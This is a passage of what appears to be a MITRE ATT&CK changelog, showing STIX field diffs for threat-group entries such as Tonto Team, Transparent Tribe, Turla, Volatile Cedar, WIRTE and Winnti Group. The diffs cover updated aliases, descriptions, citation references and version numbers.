| external_references[13]['source_name'] | Gallagher 2015 | Hacker News LuckyMouse June 2018 |
| external_references[13]['description'] | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. | Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018. |
| external_references[13]['url'] | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ | https://thehackernews.com/2018/06/chinese-watering-hole-attack.html |
| external_references[14]['source_name'] | Unit42 Emissary Panda May 2019 | Securelist LuckyMouse June 2018 |
| external_references[14]['description'] | Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. | Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018. |
| external_references[14]['url'] | https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ | https://securelist.com/luckymouse-hits-national-data-center/86083/ |
| x_mitre_version | 1.5 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Earth Smilodon | |
| external_references | {'source_name': 'Trend Micro Iron Tiger April 2021', 'description': 'Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html'} | |
| external_references | {'source_name': 'Trend Micro DRBControl February 2020', 'description': 'Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.', 'url': 'https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf'} | |
| external_references | {'source_name': 'Nccgroup Emissary Panda May 2018', 'description': 'Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.', 'url': 'https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/'} | |
| Description |
|---|
| [Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 20:56:22.161000+00:00 | 2022-01-27 17:51:41.433000+00:00 |
| external_references[1]['source_name'] | Earth Akhlut | Tonto Team |
| external_references[1]['description'] | (Citation: TrendMicro Tonto Team October 2020) | (Citation: Talos Bisonal Mar 2020) |
| external_references[2]['source_name'] | BRONZE HUNTLEY | Earth Akhlut |
| external_references[2]['description'] | (Citation: Secureworks BRONZE HUNTLEY ) | (Citation: TrendMicro Tonto Team October 2020) |
| external_references[3]['source_name'] | CactusPete | BRONZE HUNTLEY |
| external_references[3]['description'] | (Citation: Kaspersky CactusPete Aug 2020) | (Citation: Secureworks BRONZE HUNTLEY ) |
| external_references[4]['source_name'] | Karma Panda | CactusPete |
| external_references[4]['description'] | (Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020) | (Citation: Kaspersky CactusPete Aug 2020) |
| external_references[5]['source_name'] | Kaspersky CactusPete Aug 2020 | Karma Panda |
| external_references[5]['description'] | Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021. | (Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020) |
| external_references[6]['source_name'] | ESET Exchange Mar 2021 | Kaspersky CactusPete Aug 2020 |
| external_references[6]['description'] | Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021. | Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021. |
| external_references[6]['url'] | https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ | https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ |
| external_references[7]['source_name'] | FireEye Chinese Espionage October 2019 | ESET Exchange Mar 2021 |
| external_references[7]['description'] | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021. | Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021. |
| external_references[7]['url'] | https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf | https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ |
| external_references[8]['source_name'] | ARS Technica China Hack SK April 2017 | FireEye Chinese Espionage October 2019 |
| external_references[8]['description'] | Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021. | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021. |
| external_references[8]['url'] | https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/ | https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf |
| external_references[9]['source_name'] | Trend Micro HeartBeat Campaign January 2013 | ARS Technica China Hack SK April 2017 |
| external_references[9]['description'] | Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021. | Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021. |
| external_references[9]['url'] | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf? | https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/ |
| external_references[10]['source_name'] | Talos Bisonal 10 Years March 2020 | Trend Micro HeartBeat Campaign January 2013 |
| external_references[10]['description'] | Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021. | Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021. |
| external_references[10]['url'] | https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf? |
| external_references[11]['source_name'] | TrendMicro Tonto Team October 2020 | Talos Bisonal 10 Years March 2020 |
| external_references[11]['description'] | Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021. | Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021. |
| external_references[11]['url'] | https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf | https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html |
| external_references[12]['source_name'] | Secureworks BRONZE HUNTLEY | Talos Bisonal Mar 2020 |
| external_references[12]['description'] | Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021. | Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022. |
| external_references[12]['url'] | https://www.secureworks.com/research/threat-profiles/bronze-huntley | https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html |
| external_references[13]['source_name'] | CrowdStrike Manufacturing Threat July 2020 | TrendMicro Tonto Team October 2020 |
| external_references[13]['description'] | Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021. | Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021. |
| external_references[13]['url'] | https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ | https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Secureworks BRONZE HUNTLEY ', 'description': 'Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.', 'url': 'https://www.secureworks.com/research/threat-profiles/bronze-huntley'} | |
| external_references | {'source_name': 'CrowdStrike Manufacturing Threat July 2020', 'description': 'Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.', 'url': 'https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/'} | |
| Description |
|---|
| [Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-25 17:19:00.720000+00:00 | 2022-09-22 20:27:21.053000+00:00 |
| external_references[1]['source_name'] | COPPER FIELDSTONE | Mythic Leopard |
| external_references[1]['description'] | (Citation: Secureworks COPPER FIELDSTONE Profile) | (Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021) |
| external_references[2]['source_name'] | APT36 | COPPER FIELDSTONE |
| external_references[2]['description'] | (Citation: Talos Transparent Tribe May 2021) | (Citation: Secureworks COPPER FIELDSTONE Profile) |
| external_references[3]['source_name'] | Mythic Leopard | APT36 |
| external_references[3]['description'] | (Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021) | (Citation: Talos Transparent Tribe May 2021) |
| external_references[5]['source_name'] | Proofpoint Operation Transparent Tribe March 2016 | Crowdstrike Mythic Leopard Profile |
| external_references[5]['description'] | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. | Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021. |
| external_references[5]['url'] | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf | https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/ |
| external_references[7]['source_name'] | Talos Transparent Tribe May 2021 | Unit 42 ProjectM March 2016 |
| external_references[7]['description'] | Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021. | Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021. |
| external_references[7]['url'] | https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html | https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/ |
| external_references[8]['source_name'] | Secureworks COPPER FIELDSTONE Profile | Proofpoint Operation Transparent Tribe March 2016 |
| external_references[8]['description'] | Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021. | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. |
| external_references[8]['url'] | https://www.secureworks.com/research/threat-profiles/copper-fieldstone | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf |
| external_references[9]['source_name'] | Crowdstrike Mythic Leopard Profile | Talos Transparent Tribe May 2021 |
| external_references[9]['description'] | Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021. | Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021. |
| external_references[9]['url'] | https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/ | https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html |
| external_references[10]['source_name'] | Unit 42 ProjectM March 2016 | Secureworks COPPER FIELDSTONE Profile |
| external_references[10]['description'] | Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021. | Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021. |
| external_references[10]['url'] | https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/ | https://www.secureworks.com/research/threat-profiles/copper-fieldstone |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)’s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://securelist.com/the-epic-turla-operation/65545/ | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-27 14:36:25.289000+00:00 | 2022-09-28 21:27:07.133000+00:00 |
| external_references[1]['source_name'] | Turla | Belugasturgeon |
| external_references[1]['description'] | (Citation: Kaspersky Turla) | (Citation: Accenture HyperStack October 2020) |
| external_references[2]['source_name'] | Group 88 | Krypton |
| external_references[2]['description'] | (Citation: Leonardo Turla Penquin May 2020) | (Citation: CrowdStrike VENOMOUS BEAR) |
| external_references[3]['source_name'] | Belugasturgeon | Snake |
| external_references[3]['description'] | (Citation: Accenture HyperStack October 2020) | (Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos TinyTurla September 2021) |
| external_references[4]['source_name'] | Waterbug | Venomous Bear |
| external_references[4]['description'] | Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug) | (Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021) |
| external_references[5]['source_name'] | WhiteBear | Turla |
| external_references[5]['description'] | WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017) | (Citation: Kaspersky Turla) |
| external_references[6]['source_name'] | VENOMOUS BEAR | Group 88 |
| external_references[6]['description'] | (Citation: CrowdStrike VENOMOUS BEAR) | (Citation: Leonardo Turla Penquin May 2020) |
| external_references[7]['source_name'] | Snake | IRON HUNTER |
| external_references[7]['description'] | (Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019) | (Citation: Secureworks IRON HUNTER Profile) |
| external_references[8]['source_name'] | Krypton | Accenture HyperStack October 2020 |
| external_references[8]['description'] | (Citation: CrowdStrike VENOMOUS BEAR) | Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020. |
| external_references[9]['source_name'] | Kaspersky Turla | Waterbug |
| external_references[9]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014. | Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug) |
| external_references[10]['source_name'] | ESET Gazer Aug 2017 | Talos TinyTurla September 2021 |
| external_references[10]['description'] | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. | Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021. |
| external_references[10]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf | https://blog.talosintelligence.com/2021/09/tinyturla.html |
| external_references[11]['source_name'] | CrowdStrike VENOMOUS BEAR | ESET Turla Mosquito Jan 2018 |
| external_references[11]['description'] | Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018. | ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. |
| external_references[11]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/ | https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf |
| external_references[12]['source_name'] | ESET Turla Mosquito Jan 2018 | ESET Gazer Aug 2017 |
| external_references[12]['description'] | ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. |
| external_references[12]['url'] | https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
| external_references[13]['source_name'] | Leonardo Turla Penquin May 2020 | ESET Turla PowerShell May 2019 |
| external_references[13]['description'] | Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021. | Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. |
| external_references[13]['url'] | https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf | https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ |
| external_references[14]['source_name'] | Accenture HyperStack October 2020 | Securelist WhiteBear Aug 2017 |
| external_references[14]['description'] | Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020. | Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017. |
| external_references[14]['url'] | https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity | https://securelist.com/introducing-whitebear/81638/ |
| external_references[15]['source_name'] | Symantec Waterbug | Kaspersky Turla |
| external_references[15]['description'] | Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015. | Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014. |
| external_references[15]['url'] | https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1 | https://securelist.com/the-epic-turla-operation/65545/ |
| external_references[16]['source_name'] | Securelist WhiteBear Aug 2017 | Leonardo Turla Penquin May 2020 |
| external_references[16]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017. | Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021. |
| external_references[16]['url'] | https://securelist.com/introducing-whitebear/81638/ | https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf |
| external_references[17]['source_name'] | ESET Turla PowerShell May 2019 | CrowdStrike VENOMOUS BEAR |
| external_references[17]['description'] | Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. | Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018. |
| external_references[17]['url'] | https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/ |
| x_mitre_version | 2.1 | 3.0 |

| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON HUNTER | |
| aliases | Venomous Bear | |
| external_references | {'source_name': 'Secureworks IRON HUNTER Profile', 'description': 'Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.', 'url': 'http://www.secureworks.com/research/threat-profiles/iron-hunter'} | |
| external_references | {'source_name': 'Symantec Waterbug', 'description': 'Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.', 'url': 'https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1'} | |
| external_references | {'source_name': 'WhiteBear', 'description': 'WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)'} | |

| STIX Field | Old value | New value |
|---|---|---|
| aliases | VENOMOUS BEAR | |

| Description |
|---|
| [Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-10 21:01:16.908000+00:00 | 2022-04-20 20:08:15.870000+00:00 |
| external_references[3]['source_name'] | CheckPoint Volatile Cedar March 2015 | ClearSky Lebanese Cedar Jan 2021 |
| external_references[3]['description'] | Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021. | ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021. |
| external_references[3]['url'] | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf | https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf |
| external_references[4]['source_name'] | ClearSky Lebanese Cedar Jan 2021 | CheckPoint Volatile Cedar March 2015 |
| external_references[4]['description'] | ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021. | Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021. |
| external_references[4]['url'] | https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf |
| x_mitre_version | 1.0 | 1.1 |

| Old Description | New Description |
|---|---|
| [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019) | [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:50:57.491000+00:00 | 2022-04-15 19:50:19.478000+00:00 |
| description | [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019) | [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021) |
| x_mitre_version | 1.2 | 2.0 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Kaspersky WIRTE November 2021', 'description': 'Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.', 'url': 'https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044'} | |

| Old Description | New Description |
|---|---|
| [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018) | [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-05 15:59:50.451000+00:00 | 2022-04-15 16:27:20.897000+00:00 |
| description | [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018) | [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018) |
| external_references[3]['source_name'] | Kaspersky Winnti April 2013 | Symantec Suckfly March 2016 |
| external_references[3]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. | DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. |
| external_references[3]['url'] | https://securelist.com/winnti-more-than-just-a-game/37029/ | http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates |
| external_references[4]['source_name'] | Kaspersky Winnti June 2015 | 401 TRG Winnti Umbrella May 2018 |
| external_references[4]['description'] | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. | Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018. |
| external_references[4]['url'] | https://securelist.com/games-are-over/70991/ | https://401trg.github.io/pages/burning-umbrella.html |
